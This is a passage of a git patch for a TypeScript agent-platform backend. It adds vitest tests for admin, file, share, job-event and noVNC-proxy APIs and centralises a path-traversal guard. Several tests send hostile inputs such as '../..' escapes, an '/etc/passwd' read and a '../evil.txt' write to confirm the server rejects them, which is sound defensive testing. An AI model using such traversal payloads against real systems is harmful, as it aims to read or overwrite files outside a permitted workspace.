From 550247863614e4e4eaaa9ba45b45388d93f8e246 Mon Sep 17 00:00:00 2001 From: oss-sync Date: Wed, 10 Jun 2026 08:40:41 +0000 Subject: [PATCH] sync: update from private repo (5b6df2f) --- src/bridge/admin-gateway-status-api.test.ts | 143 ++++ src/bridge/job-events.test.ts | 104 +++ src/bridge/local-api-helpers.ts | 5 + src/bridge/local-files-api.test.ts | 239 +++++++ src/bridge/local-files-api.ts | 19 +- src/bridge/novnc-proxy.test.ts | 198 ++++++ src/bridge/share-api.test.ts | 21 + src/bridge/share-api.ts | 25 +- src/bridge/skills-api.test.ts | 289 ++++++++ src/bridge/subtask-files-api.test.ts | 183 ++++++ src/bridge/users-api.test.ts | 207 ++++++ src/engine/context/cache-key.test.ts | 175 +++++ src/engine/context/invalidation.test.ts | 44 ++ src/engine/context/token-estimate.test.ts | 185 ++++++ .../reflection/reflection-prompt.test.ts | 160 +++++ .../reflection/reflection-runner.test.ts | 172 +++++ .../reflection/reflection-schema.test.ts | 71 ++ src/engine/reflection/revisions.test.ts | 40 ++ src/engine/strip-thinking.test.ts | 52 ++ src/engine/tools/amazon.test.ts | 152 +++++ src/engine/tools/amazon.ts | 5 +- src/engine/tools/data.test.ts | 479 ++++++++++++++ src/engine/tools/maps.test.ts | 566 ++++++++++++++++ src/engine/tools/ms-learn.test.ts | 244 +++++++ src/engine/tools/orchestration.test.ts | 118 ++++ src/engine/tools/speech.test.ts | 157 +++++ src/engine/tools/structured-blocks.test.ts | 59 ++ src/engine/tools/youtube.test.ts | 410 ++++++++++++ src/gateway/server.test.ts | 153 +++++ src/scheduling.test.ts | 114 ++++ src/ssh/console-protocol.test.ts | 167 +++++ src/ssh/recovery.test.ts | 123 ++++ src/user-folder/pets.test.ts | 616 ++++++++++++++++++ src/user-folder/script-orchestrator.test.ts | 158 +++++ src/user-folder/session-loader.test.ts | 110 ++++ ui/src/App.tsx | 6 + ui/src/components/list/TaskListPanel.tsx | 61 +- ui/src/lib/help.test.ts | 157 +++++ ui/src/lib/taskScope.test.ts | 28 + ui/src/lib/taskScope.ts | 21 + ui/src/lib/unsavedGuard.test.ts | 26 + ui/src/lib/urlState.test.ts | 203 ++++++ ui/src/lib/urlState.ts | 5 + 43 files changed, 6452 insertions(+), 18 deletions(-) create mode 100644 src/bridge/admin-gateway-status-api.test.ts create mode 100644 src/bridge/job-events.test.ts create mode 100644 src/bridge/local-files-api.test.ts create mode 100644 src/bridge/novnc-proxy.test.ts create mode 100644 src/bridge/skills-api.test.ts create mode 100644 src/bridge/subtask-files-api.test.ts create mode 100644 src/bridge/users-api.test.ts create mode 100644 src/engine/context/cache-key.test.ts create mode 100644 src/engine/context/invalidation.test.ts create mode 100644 src/engine/context/token-estimate.test.ts create mode 100644 src/engine/reflection/reflection-prompt.test.ts create mode 100644 src/engine/reflection/reflection-runner.test.ts create mode 100644 src/engine/reflection/reflection-schema.test.ts create mode 100644 src/engine/reflection/revisions.test.ts create mode 100644 src/engine/strip-thinking.test.ts create mode 100644 src/engine/tools/amazon.test.ts create mode 100644 src/engine/tools/data.test.ts create mode 100644 src/engine/tools/maps.test.ts create mode 100644 src/engine/tools/ms-learn.test.ts create mode 100644 src/engine/tools/orchestration.test.ts create mode 100644 src/engine/tools/speech.test.ts create mode 100644 src/engine/tools/structured-blocks.test.ts create mode 100644 src/engine/tools/youtube.test.ts create mode 100644 src/gateway/server.test.ts create mode 100644 src/scheduling.test.ts create mode 100644 src/ssh/console-protocol.test.ts create mode 100644 src/ssh/recovery.test.ts create mode 100644 src/user-folder/pets.test.ts create mode 100644 src/user-folder/script-orchestrator.test.ts create mode 100644 src/user-folder/session-loader.test.ts create mode 100644 ui/src/lib/help.test.ts create mode 100644 ui/src/lib/taskScope.test.ts create mode 100644 ui/src/lib/taskScope.ts create mode 100644 ui/src/lib/unsavedGuard.test.ts create mode 100644 ui/src/lib/urlState.test.ts diff --git a/src/bridge/admin-gateway-status-api.test.ts b/src/bridge/admin-gateway-status-api.test.ts new file mode 100644 index 0000000..838abfb --- /dev/null +++ b/src/bridge/admin-gateway-status-api.test.ts @@ -0,0 +1,143 @@ +import { describe, it, expect, vi } from 'vitest'; +import express from 'express'; +import request from 'supertest'; +import { createAdminGatewayStatusRouter, type AdminGatewayStatusDeps } from './admin-gateway-status-api.js'; +import type { GatewayMountHandle } from './gateway-mount.js'; +import type { ConfigManager } from '../config-manager.js'; + +function makeMount(state: string, errors: string[] = []): GatewayMountHandle { + return { + getState: vi.fn().mockReturnValue(state), + getErrors: vi.fn().mockReturnValue(errors), + applyConfig: vi.fn(), + stop: vi.fn(), + } as unknown as GatewayMountHandle; +} + +function makeConfigManager(config: unknown): ConfigManager { + return { + getConfig: vi.fn().mockReturnValue(config), + } as unknown as ConfigManager; +} + +function makeApp(deps: AdminGatewayStatusDeps): express.Application { + const app = express(); + app.use('/api/admin/gateway/status', createAdminGatewayStatusRouter(deps)); + return app; +} + +describe('Admin Gateway Status API', () => { + it('reports unavailable when there is no mount handle', async () => { + const app = makeApp({ mount: null, configManager: null, workerPort: 9876 }); + + const res = await request(app).get('/api/admin/gateway/status'); + + expect(res.status).toBe(200); + expect(res.body).toEqual({ + state: 'unavailable', + enabled: null, + errors: [], + mounted: false, + sharedPort: 9876, + message: 'gateway hot-reload unsupported in this deploy (no ConfigManager)', + }); + }); + + it('reports the desired enabled flag from config even without a mount', async () => { + const app = makeApp({ + mount: null, + configManager: makeConfigManager({ gateway: { enabled: true } }), + workerPort: 4000, + }); + + const res = await request(app).get('/api/admin/gateway/status'); + + expect(res.status).toBe(200); + expect(res.body.state).toBe('unavailable'); + expect(res.body.enabled).toBe(true); + expect(res.body.sharedPort).toBe(4000); + }); + + it('reports mounted=true when the mount state is running', async () => { + const app = makeApp({ + mount: makeMount('running'), + configManager: makeConfigManager({ gateway: { enabled: true } }), + workerPort: 9876, + }); + + const res = await request(app).get('/api/admin/gateway/status'); + + expect(res.status).toBe(200); + expect(res.body).toEqual({ + state: 'running', + enabled: true, + errors: [], + mounted: false || true, // mounted is true exactly when state === 'running' + sharedPort: 9876, + }); + expect(res.body.mounted).toBe(true); + }); + + it('reports mounted=false with validation errors when disabled', async () => { + const errors = ['backend url missing', 'no virtual keys']; + const app = makeApp({ + mount: makeMount('disabled', errors), + configManager: makeConfigManager({ gateway: { enabled: false } }), + workerPort: 9876, + }); + + const res = await request(app).get('/api/admin/gateway/status'); + + expect(res.status).toBe(200); + expect(res.body.state).toBe('disabled'); + expect(res.body.enabled).toBe(false); + expect(res.body.mounted).toBe(false); + expect(res.body.errors).toEqual(errors); + }); + + it('defaults enabled to false when the config has no gateway block', async () => { + // readGatewayConfig normalizes a missing block to enabled=false. + const app = makeApp({ + mount: makeMount('disabled'), + configManager: makeConfigManager({}), + workerPort: 9876, + }); + + const res = await request(app).get('/api/admin/gateway/status'); + + expect(res.status).toBe(200); + expect(res.body.enabled).toBe(false); + }); + + it('reports enabled=null when reading the config throws', async () => { + const throwing = { + getConfig: vi.fn().mockImplementation(() => { throw new Error('config unreadable'); }), + } as unknown as ConfigManager; + const app = makeApp({ + mount: makeMount('running'), + configManager: throwing, + workerPort: 9876, + }); + + const res = await request(app).get('/api/admin/gateway/status'); + + expect(res.status).toBe(200); + expect(res.body.enabled).toBeNull(); + expect(res.body.state).toBe('running'); + }); + + it('reports enabled=null when there is a mount but no ConfigManager', async () => { + const app = makeApp({ + mount: makeMount('starting'), + configManager: null, + workerPort: 9876, + }); + + const res = await request(app).get('/api/admin/gateway/status'); + + expect(res.status).toBe(200); + expect(res.body.state).toBe('starting'); + expect(res.body.enabled).toBeNull(); + expect(res.body.mounted).toBe(false); + }); +}); diff --git a/src/bridge/job-events.test.ts b/src/bridge/job-events.test.ts new file mode 100644 index 0000000..ba1aee2 --- /dev/null +++ b/src/bridge/job-events.test.ts @@ -0,0 +1,104 @@ +import { describe, it, expect, afterEach, vi } from 'vitest'; +import { jobEventBus, type JobStreamEvent } from './job-events.js'; + +// jobEventBus is a module-level singleton. Track every jobId used so we can +// clean its listeners up after each test without disturbing other suites. +const usedJobIds: string[] = []; + +function track(jobId: string): string { + usedJobIds.push(jobId); + return jobId; +} + +afterEach(() => { + for (const id of usedJobIds.splice(0)) { + jobEventBus.removeAllListeners(`job:${id}`); + } +}); + +describe('jobEventBus', () => { + it('delivers an emitted event to a subscribed handler', () => { + const jobId = track('job-events-test-1'); + const handler = vi.fn(); + jobEventBus.onJob(jobId, handler); + + const event: JobStreamEvent = { type: 'text', text: 'hello' }; + jobEventBus.emitJob(jobId, event); + + expect(handler).toHaveBeenCalledTimes(1); + expect(handler).toHaveBeenCalledWith(event); + }); + + it('does not deliver events across different job ids', () => { + const jobA = track('job-events-test-a'); + const jobB = track('job-events-test-b'); + const handlerA = vi.fn(); + const handlerB = vi.fn(); + jobEventBus.onJob(jobA, handlerA); + jobEventBus.onJob(jobB, handlerB); + + jobEventBus.emitJob(jobA, { type: 'done' }); + + expect(handlerA).toHaveBeenCalledTimes(1); + expect(handlerB).not.toHaveBeenCalled(); + }); + + it('stops delivering after offJob', () => { + const jobId = track('job-events-test-off'); + const handler = vi.fn(); + jobEventBus.onJob(jobId, handler); + jobEventBus.emitJob(jobId, { type: 'text', text: '1' }); + jobEventBus.offJob(jobId, handler); + jobEventBus.emitJob(jobId, { type: 'text', text: '2' }); + + expect(handler).toHaveBeenCalledTimes(1); + }); + + it('offJob only removes the given handler, not other subscribers', () => { + const jobId = track('job-events-test-multi'); + const kept = vi.fn(); + const removed = vi.fn(); + jobEventBus.onJob(jobId, kept); + jobEventBus.onJob(jobId, removed); + + jobEventBus.offJob(jobId, removed); + jobEventBus.emitJob(jobId, { type: 'done' }); + + expect(kept).toHaveBeenCalledTimes(1); + expect(removed).not.toHaveBeenCalled(); + }); + + it('hasListeners reflects subscription state', () => { + const jobId = track('job-events-test-has'); + expect(jobEventBus.hasListeners(jobId)).toBe(false); + + const handler = vi.fn(); + jobEventBus.onJob(jobId, handler); + expect(jobEventBus.hasListeners(jobId)).toBe(true); + + jobEventBus.offJob(jobId, handler); + expect(jobEventBus.hasListeners(jobId)).toBe(false); + }); + + it('supports the full event-type union with payload fields', () => { + const jobId = track('job-events-test-payload'); + const received: JobStreamEvent[] = []; + jobEventBus.onJob(jobId, e => received.push(e)); + + jobEventBus.emitJob(jobId, { type: 'prompt_progress', processed: 10, total: 100, timeMs: 5, cache: 2 }); + jobEventBus.emitJob(jobId, { type: 'tool_use', toolName: 'Read', toolInput: '{"path":"x"}', callId: 'c1' }); + jobEventBus.emitJob(jobId, { type: 'tool_use_delta', callId: 'c1', name: 'Read', chunk: '{"pa' }); + jobEventBus.emitJob(jobId, { type: 'tool_result', toolName: 'Read', toolOutput: 'ok', toolIsError: false, callId: 'c1' }); + jobEventBus.emitJob(jobId, { type: 'done' }); + + expect(received.map(e => e.type)).toEqual([ + 'prompt_progress', 'tool_use', 'tool_use_delta', 'tool_result', 'done', + ]); + expect(received[0].processed).toBe(10); + expect(received[3].toolIsError).toBe(false); + }); + + it('raises the max listener limit to 200 (no warning for many SSE clients)', () => { + expect(jobEventBus.getMaxListeners()).toBe(200); + }); +}); diff --git a/src/bridge/local-api-helpers.ts b/src/bridge/local-api-helpers.ts index 5b7be98..d705c96 100644 --- a/src/bridge/local-api-helpers.ts +++ b/src/bridge/local-api-helpers.ts @@ -15,6 +15,11 @@ export function ensurePathWithin(baseDir: string, requestedPath: string): string return resolvedPath; } +/** True when the error came from ensurePathWithin's traversal guard. */ +export function isPathEscapeError(err: unknown): boolean { + return err instanceof Error && err.message === 'Path escapes workspace'; +} + export function serializeLocalFileEntry(relativePath: string, name: string, isDirectory: boolean, size: number, mtime: Date) { return { name, diff --git a/src/bridge/local-files-api.test.ts b/src/bridge/local-files-api.test.ts new file mode 100644 index 0000000..211e90e --- /dev/null +++ b/src/bridge/local-files-api.test.ts @@ -0,0 +1,239 @@ +import { describe, it, expect, beforeEach, afterEach, vi } from 'vitest'; +import express from 'express'; +import request from 'supertest'; +import { mkdtempSync, rmSync, mkdirSync, writeFileSync, readFileSync, existsSync } from 'fs'; +import { join } from 'path'; +import { tmpdir } from 'os'; +import { mountLocalFilesApi } from './local-files-api.js'; +import type { Repository } from '../db/repository.js'; + +let ws: string; + +function makeRepo(overrides: Partial = {}): Repository { + return { + getLocalTask: vi.fn().mockResolvedValue({ + id: 1, + ownerId: 'user-1', + visibility: 'private', + workspacePath: ws, + }), + getLatestJobForIssue: vi.fn().mockResolvedValue(null), + ...overrides, + } as unknown as Repository; +} + +function makeUser(overrides: Partial = {}): Express.User { + return { + id: 'user-1', + email: 'u@example.com', + name: 'User One', + avatarUrl: null, + role: 'user', + status: 'active', + orgIds: [], + defaultVisibility: 'private', + defaultVisibilityOrgId: null, + ...overrides, + }; +} + +function makeApp(repo: Repository, user?: Express.User): express.Application { + const app = express(); + if (user) { + app.use((req, _res, next) => { + (req as unknown as { user: Express.User }).user = user; + next(); + }); + } + mountLocalFilesApi(app, repo); + return app; +} + +beforeEach(() => { + ws = mkdtempSync(join(tmpdir(), 'local-files-api-')); + mkdirSync(join(ws, 'input'), { recursive: true }); + mkdirSync(join(ws, 'output', 'sub'), { recursive: true }); + writeFileSync(join(ws, 'input', 'data.csv'), 'a,b\n1,2\n'); + writeFileSync(join(ws, 'output', 'report.md'), '# report'); + writeFileSync(join(ws, 'output', 'sub', 'nested.txt'), 'nested'); + // A file just outside the workspace that traversal must never reach. + writeFileSync(join(ws, '..', `outside-${process.pid}.txt`), 'secret'); +}); + +afterEach(() => { + rmSync(ws, { recursive: true, force: true }); + rmSync(join(ws, '..', `outside-${process.pid}.txt`), { force: true }); +}); + +describe('GET /api/local/tasks/:taskId/files (listing)', () => { + it('lists the input section by default', async () => { + const res = await request(makeApp(makeRepo(), makeUser())).get('/api/local/tasks/1/files'); + expect(res.status).toBe(200); + expect(res.body.basePath).toBe('input'); + expect(res.body.entries.map((e: { name: string }) => e.name)).toEqual(['data.csv']); + }); + + it('lists a subdirectory via the path query', async () => { + const res = await request(makeApp(makeRepo(), makeUser())) + .get('/api/local/tasks/1/files?section=output&path=sub'); + expect(res.status).toBe(200); + expect(res.body.entries.map((e: { name: string }) => e.name)).toEqual(['nested.txt']); + }); + + it('rejects an unknown section with 400', async () => { + const res = await request(makeApp(makeRepo(), makeUser())) + .get('/api/local/tasks/1/files?section=secrets'); + expect(res.status).toBe(400); + }); + + it('rejects an invalid task id with 400', async () => { + const res = await request(makeApp(makeRepo(), makeUser())).get('/api/local/tasks/-1/files'); + expect(res.status).toBe(400); + }); + + it('hides a private task from a non-owner with 404', async () => { + const res = await request(makeApp(makeRepo(), makeUser({ id: 'stranger' }))) + .get('/api/local/tasks/1/files'); + expect(res.status).toBe(404); + }); + + it('rejects directory traversal on listing with 400', async () => { + const res = await request(makeApp(makeRepo(), makeUser())) + .get('/api/local/tasks/1/files?section=input&path=..%2F..'); + expect(res.status).toBe(400); + expect(res.body.error).toBe('Path escapes workspace'); + expect(JSON.stringify(res.body)).not.toContain('outside-'); + }); +}); + +describe('GET /api/local/tasks/:taskId/files/content', () => { + it('serves file content as text/plain', async () => { + const res = await request(makeApp(makeRepo(), makeUser())) + .get('/api/local/tasks/1/files/content?section=output&path=report.md'); + expect(res.status).toBe(200); + expect(res.headers['content-type']).toContain('text/plain'); + expect(res.text).toBe('# report'); + }); + + it('requires a path', async () => { + const res = await request(makeApp(makeRepo(), makeUser())) + .get('/api/local/tasks/1/files/content?section=output'); + expect(res.status).toBe(400); + expect(res.body.error).toBe('path is required'); + }); + + it('rejects a directory path with 400', async () => { + const res = await request(makeApp(makeRepo(), makeUser())) + .get('/api/local/tasks/1/files/content?section=output&path=sub'); + expect(res.status).toBe(400); + expect(res.body.error).toBe('path must point to a file'); + }); + + it('rejects traversal reads with 400 and never serves outside files', async () => { + const res = await request(makeApp(makeRepo(), makeUser())) + .get(`/api/local/tasks/1/files/content?section=input&path=..%2F..%2Foutside-${process.pid}.txt`); + expect(res.status).toBe(400); + expect(res.body.error).toBe('Path escapes workspace'); + expect(res.text).not.toContain('secret'); + }); + + it('strips leading slashes so absolute paths stay inside the workspace', async () => { + const res = await request(makeApp(makeRepo(), makeUser())) + .get('/api/local/tasks/1/files/content?section=input&path=%2Fetc%2Fpasswd'); + expect([404, 500]).toContain(res.status); + expect(res.text).not.toContain('root:'); + }); +}); + +describe('GET /api/local/tasks/:taskId/files/raw', () => { + it('serves bytes with a type derived from the extension', async () => { + const res = await request(makeApp(makeRepo(), makeUser())) + .get('/api/local/tasks/1/files/raw?section=output&path=report.md'); + expect(res.status).toBe(200); + expect(res.headers['content-type']).toContain('markdown'); + }); + + it('rejects traversal reads with 400 and never serves outside files', async () => { + const res = await request(makeApp(makeRepo(), makeUser())) + .get(`/api/local/tasks/1/files/raw?section=input&path=..%2F..%2Foutside-${process.pid}.txt`); + expect(res.status).toBe(400); + expect(res.body.error).toBe('Path escapes workspace'); + expect(res.text).not.toContain('secret'); + }); +}); + +describe('PUT /api/local/tasks/:taskId/files/content', () => { + const put = (app: express.Application, body: unknown) => + request(app).put('/api/local/tasks/1/files/content').send(body as object); + + it('writes an output file for the owner', async () => { + const res = await put(makeApp(makeRepo(), makeUser()), { + section: 'output', + path: 'report.md', + content: 'updated', + }); + expect(res.status).toBe(200); + expect(readFileSync(join(ws, 'output', 'report.md'), 'utf-8')).toBe('updated'); + }); + + it('hides the task from a non-owner with 404', async () => { + const res = await put(makeApp(makeRepo(), makeUser({ id: 'stranger' })), { + section: 'output', + path: 'report.md', + content: 'x', + }); + expect(res.status).toBe(404); + expect(readFileSync(join(ws, 'output', 'report.md'), 'utf-8')).toBe('# report'); + }); + + it('lets an admin edit another user\'s task', async () => { + const res = await put(makeApp(makeRepo(), makeUser({ id: 'admin-1', role: 'admin' })), { + section: 'output', + path: 'report.md', + content: 'admin edit', + }); + expect(res.status).toBe(200); + }); + + it('refuses edits while a job is running', async () => { + const repo = makeRepo({ + getLatestJobForIssue: vi.fn().mockResolvedValue({ status: 'running' }), + } as Partial); + const res = await put(makeApp(repo, makeUser()), { + section: 'output', + path: 'report.md', + content: 'x', + }); + expect(res.status).toBe(409); + }); + + it('only allows the output section', async () => { + const res = await put(makeApp(makeRepo(), makeUser()), { + section: 'input', + path: 'data.csv', + content: 'x', + }); + expect(res.status).toBe(400); + expect(res.body.error).toBe('Only output files can be edited'); + }); + + it('requires string content', async () => { + const res = await put(makeApp(makeRepo(), makeUser()), { + section: 'output', + path: 'report.md', + content: 42, + }); + expect(res.status).toBe(400); + }); + + it('rejects traversal writes with 400 and writes nothing', async () => { + const res = await put(makeApp(makeRepo(), makeUser()), { + section: 'output', + path: '../evil.txt', + content: 'pwned', + }); + expect(res.status).toBe(400); + expect(res.body.error).toBe('Path escapes workspace'); + expect(existsSync(join(ws, 'evil.txt'))).toBe(false); + }); +}); diff --git a/src/bridge/local-files-api.ts b/src/bridge/local-files-api.ts index be285a0..5e817cd 100644 --- a/src/bridge/local-files-api.ts +++ b/src/bridge/local-files-api.ts @@ -4,7 +4,7 @@ import { join, extname } from 'path'; import { Repository, localTaskRepoName } from '../db/repository.js'; import { logger } from '../logger.js'; import { parseTaskId } from './validation.js'; -import { ensurePathWithin, serializeLocalFileEntry, checkTaskOwnership, canViewTask } from './local-api-helpers.js'; +import { ensurePathWithin, isPathEscapeError, serializeLocalFileEntry, checkTaskOwnership, canViewTask } from './local-api-helpers.js'; export function mountLocalFilesApi(app: Application, repo: Repository): void { @@ -39,6 +39,10 @@ export function mountLocalFilesApi(app: Application, repo: Repository): void { }); res.json({ basePath: section, path: relativeDir, entries }); } catch (err) { + if (isPathEscapeError(err)) { + res.status(400).json({ error: 'Path escapes workspace' }); + return; + } logger.error(`Local files list API error: ${err}`); res.status(500).json({ error: 'Failed to list files' }); } @@ -79,6 +83,10 @@ export function mountLocalFilesApi(app: Application, repo: Repository): void { res.setHeader('Content-Type', 'text/plain; charset=utf-8'); res.send(readFileSync(filePath, 'utf-8')); } catch (err) { + if (isPathEscapeError(err)) { + res.status(400).json({ error: 'Path escapes workspace' }); + return; + } logger.error(`Local file content API error: ${err}`); res.status(500).json({ error: 'Failed to read file' }); } @@ -119,6 +127,10 @@ export function mountLocalFilesApi(app: Application, repo: Repository): void { res.type(extname(filePath) || 'application/octet-stream'); res.send(readFileSync(filePath)); } catch (err) { + if (isPathEscapeError(err)) { + res.status(400).json({ error: 'Path escapes workspace' }); + return; + } logger.error(`Local file raw API error: ${err}`); res.status(500).json({ error: 'Failed to read raw file' }); } @@ -164,9 +176,8 @@ export function mountLocalFilesApi(app: Application, repo: Repository): void { writeFileSync(filePath, content, 'utf-8'); res.json({ ok: true }); } catch (err) { - const message = err instanceof Error ? err.message : String(err); - if (message === 'Path escapes workspace') { - res.status(400).json({ error: message }); + if (isPathEscapeError(err)) { + res.status(400).json({ error: 'Path escapes workspace' }); return; } logger.error(`Local file update API error: ${err}`); diff --git a/src/bridge/novnc-proxy.test.ts b/src/bridge/novnc-proxy.test.ts new file mode 100644 index 0000000..2857524 --- /dev/null +++ b/src/bridge/novnc-proxy.test.ts @@ -0,0 +1,198 @@ +import { describe, it, expect, vi, beforeEach } from 'vitest'; +import { EventEmitter } from 'node:events'; +import type { Server } from 'http'; +import type { SessionManager, BrowserSession } from '../engine/browser-session.js'; + +const proxyWs = vi.fn(); +const proxyOn = vi.fn(); +vi.mock('http-proxy', () => ({ + default: { createProxyServer: vi.fn(() => ({ ws: proxyWs, on: proxyOn })) }, +})); + +import { + buildNovncPath, + isNovncStaticInstalled, + setupNovncWebSocketProxy, +} from './novnc-proxy.js'; + +const flush = () => new Promise((r) => setImmediate(r)); + +function makeSession(overrides: Partial = {}): BrowserSession { + return { + id: 'sess-1', + novncPort: 6080, + userId: 'owner-1', + kind: 'task', + taskId: 5, + ...overrides, + } as unknown as BrowserSession; +} + +function makeUser(overrides: Partial = {}): Express.User { + return { id: 'owner-1', role: 'user' } as Express.User; +} + +function setup(opts: { + session?: BrowserSession | null; + manager?: boolean; + authenticateUpgrade?: (req: unknown) => Promise; + authorizeSession?: (s: BrowserSession, u: Express.User) => Promise; +} = {}) { + const server = new EventEmitter() as unknown as Server; + const session = opts.session === undefined ? makeSession() : opts.session; + const sm = + opts.manager === false + ? null + : ({ getSession: vi.fn((id: string) => (id === 'sess-1' ? session : null)) } as unknown as SessionManager); + setupNovncWebSocketProxy( + server, + () => sm, + opts.authenticateUpgrade as never, + opts.authorizeSession as never, + ); + const socket = { destroy: vi.fn() }; + const emit = (url: string) => + (server as unknown as EventEmitter).emit('upgrade', { url }, socket, Buffer.alloc(0)); + return { emit, socket }; +} + +beforeEach(() => { + proxyWs.mockClear(); +}); + +describe('buildNovncPath', () => { + it('builds an absolute websockify path with autoconnect', () => { + expect(buildNovncPath('abc')).toBe( + '/novnc/vnc.html?path=/novnc/abc/websockify&autoconnect=true&resize=scale', + ); + }); +}); + +describe('isNovncStaticInstalled', () => { + it('returns a boolean without throwing', () => { + expect(typeof isNovncStaticInstalled()).toBe('boolean'); + }); +}); + +describe('setupNovncWebSocketProxy upgrade handling', () => { + it('ignores non-novnc upgrade URLs', async () => { + const { emit, socket } = setup(); + emit('/some/other/ws'); + await flush(); + expect(socket.destroy).not.toHaveBeenCalled(); + expect(proxyWs).not.toHaveBeenCalled(); + }); + + it('rejects when the session manager is unavailable', async () => { + const { emit, socket } = setup({ manager: false }); + emit('/novnc/sess-1/websockify'); + await flush(); + expect(socket.destroy).toHaveBeenCalled(); + expect(proxyWs).not.toHaveBeenCalled(); + }); + + it('rejects unknown sessions', async () => { + const { emit, socket } = setup(); + emit('/novnc/no-such-session/websockify'); + await flush(); + expect(socket.destroy).toHaveBeenCalled(); + expect(proxyWs).not.toHaveBeenCalled(); + }); + + it('proxies without auth checks in no-auth mode', async () => { + const { emit, socket } = setup(); + emit('/novnc/sess-1/websockify'); + await flush(); + expect(socket.destroy).not.toHaveBeenCalled(); + expect(proxyWs).toHaveBeenCalledWith( + expect.anything(), expect.anything(), expect.anything(), + { target: 'http://127.0.0.1:6080' }, + ); + }); + + it('tolerates the legacy double-slash prefix (noVNC v1.5.x)', async () => { + const { emit } = setup(); + emit('//novnc/sess-1/websockify'); + await flush(); + expect(proxyWs).toHaveBeenCalled(); + }); + + it('rejects unauthenticated upgrades when auth is active', async () => { + const { emit, socket } = setup({ + authenticateUpgrade: vi.fn().mockResolvedValue(null), + }); + emit('/novnc/sess-1/websockify'); + await flush(); + expect(socket.destroy).toHaveBeenCalled(); + expect(proxyWs).not.toHaveBeenCalled(); + }); + + it('consults authorizeSession and proxies on approval', async () => { + const authorize = vi.fn().mockResolvedValue(true); + const { emit, socket } = setup({ + authenticateUpgrade: vi.fn().mockResolvedValue(makeUser()), + authorizeSession: authorize, + }); + emit('/novnc/sess-1/websockify'); + await flush(); + expect(authorize).toHaveBeenCalled(); + expect(socket.destroy).not.toHaveBeenCalled(); + expect(proxyWs).toHaveBeenCalled(); + }); + + it('rejects when authorizeSession denies', async () => { + const { emit, socket } = setup({ + authenticateUpgrade: vi.fn().mockResolvedValue(makeUser()), + authorizeSession: vi.fn().mockResolvedValue(false), + }); + emit('/novnc/sess-1/websockify'); + await flush(); + expect(socket.destroy).toHaveBeenCalled(); + expect(proxyWs).not.toHaveBeenCalled(); + }); + + it('rejects (fail-closed) when authorizeSession throws', async () => { + const { emit, socket } = setup({ + authenticateUpgrade: vi.fn().mockResolvedValue(makeUser()), + authorizeSession: vi.fn().mockRejectedValue(new Error('db down')), + }); + emit('/novnc/sess-1/websockify'); + await flush(); + expect(socket.destroy).toHaveBeenCalled(); + expect(proxyWs).not.toHaveBeenCalled(); + }); + + it('falls back to owner-or-admin without authorizeSession', async () => { + // Owner passes. + const owner = setup({ authenticateUpgrade: vi.fn().mockResolvedValue(makeUser()) }); + owner.emit('/novnc/sess-1/websockify'); + await flush(); + expect(proxyWs).toHaveBeenCalledTimes(1); + + // A stranger is rejected. + const stranger = setup({ + authenticateUpgrade: vi.fn().mockResolvedValue({ id: 'other', role: 'user' } as Express.User), + }); + stranger.emit('/novnc/sess-1/websockify'); + await flush(); + expect(stranger.socket.destroy).toHaveBeenCalled(); + expect(proxyWs).toHaveBeenCalledTimes(1); + + // An admin passes. + const admin = setup({ + authenticateUpgrade: vi.fn().mockResolvedValue({ id: 'adm', role: 'admin' } as Express.User), + }); + admin.emit('/novnc/sess-1/websockify'); + await flush(); + expect(proxyWs).toHaveBeenCalledTimes(2); + }); + + it('rejects when the auth check itself fails', async () => { + const { emit, socket } = setup({ + authenticateUpgrade: vi.fn().mockRejectedValue(new Error('session store down')), + }); + emit('/novnc/sess-1/websockify'); + await flush(); + expect(socket.destroy).toHaveBeenCalled(); + }); +}); diff --git a/src/bridge/share-api.test.ts b/src/bridge/share-api.test.ts index f0fa863..35495ed 100644 --- a/src/bridge/share-api.test.ts +++ b/src/bridge/share-api.test.ts @@ -133,6 +133,27 @@ describe('Share API', () => { expect(res.status).toBe(200); }); + it('rejects path traversal on shared file endpoints with 400', async () => { + const ctx = setup(); + tempDir = ctx.tempDir; + const task = await ctx.repo.createLocalTask({ title: 'test', body: 'body' }); + const wsPath = join(tempDir, 'ws'); + mkdirSync(join(wsPath, 'output'), { recursive: true }); + // A file outside output/ that traversal must never reach. + writeFileSync(join(wsPath, 'secret.txt'), 'do-not-leak'); + await ctx.repo.updateLocalTask(task.id, { workspacePath: wsPath }); + + const shareRes = await request(ctx.app).post(`/api/local/tasks/${task.id}/share`); + const token = shareRes.body.shareToken; + + for (const ep of ['files?path=..', 'files/content?path=..%2Fsecret.txt', 'files/raw?path=..%2Fsecret.txt']) { + const res = await request(ctx.app).get(`/api/shared/${token}/${ep}`); + expect(res.status, ep).toBe(400); + expect(res.body.error, ep).toBe('Path escapes workspace'); + expect(res.text, ep).not.toContain('do-not-leak'); + } + }); + // --- Cross-user authorization --- it('POST /share by non-owner non-admin returns 404', async () => { diff --git a/src/bridge/share-api.ts b/src/bridge/share-api.ts index ba00197..4f03e20 100644 --- a/src/bridge/share-api.ts +++ b/src/bridge/share-api.ts @@ -1,19 +1,10 @@ import express, { Request, Response } from 'express'; import { readdirSync, statSync, readFileSync, mkdirSync } from 'fs'; -import { join, resolve, sep, extname } from 'path'; +import { join, extname } from 'path'; import { Repository, localTaskRepoName } from '../db/repository.js'; import { logger } from '../logger.js'; import { parseTaskId } from './validation.js'; -import { checkTaskOwnership } from './local-api-helpers.js'; - -function ensurePathWithin(baseDir: string, requestedPath: string): string { - const resolvedBase = resolve(baseDir); - const resolvedPath = resolve(baseDir, requestedPath); - if (!resolvedPath.startsWith(resolvedBase + sep) && resolvedPath !== resolvedBase) { - throw new Error('Path escapes workspace'); - } - return resolvedPath; -} +import { checkTaskOwnership, ensurePathWithin, isPathEscapeError } from './local-api-helpers.js'; function sanitizeTaskForPublic(task: Record): Record { const { ownerId, workspacePath, body, ...safe } = task; @@ -67,6 +58,10 @@ export function mountShareApi(app: express.Application, repo: Repository): void }); res.json({ basePath: 'output', path: relativeDir, entries }); } catch (err) { + if (isPathEscapeError(err)) { + res.status(400).json({ error: 'Path escapes workspace' }); + return; + } logger.error(`Shared files API error: ${err}`); res.status(500).json({ error: 'Failed to list files' }); } @@ -88,6 +83,10 @@ export function mountShareApi(app: express.Application, repo: Repository): void res.setHeader('Content-Type', 'text/plain; charset=utf-8'); res.send(readFileSync(filePath, 'utf-8')); } catch (err) { + if (isPathEscapeError(err)) { + res.status(400).json({ error: 'Path escapes workspace' }); + return; + } logger.error(`Shared file content API error: ${err}`); res.status(500).json({ error: 'Failed to read file' }); } @@ -109,6 +108,10 @@ export function mountShareApi(app: express.Application, repo: Repository): void 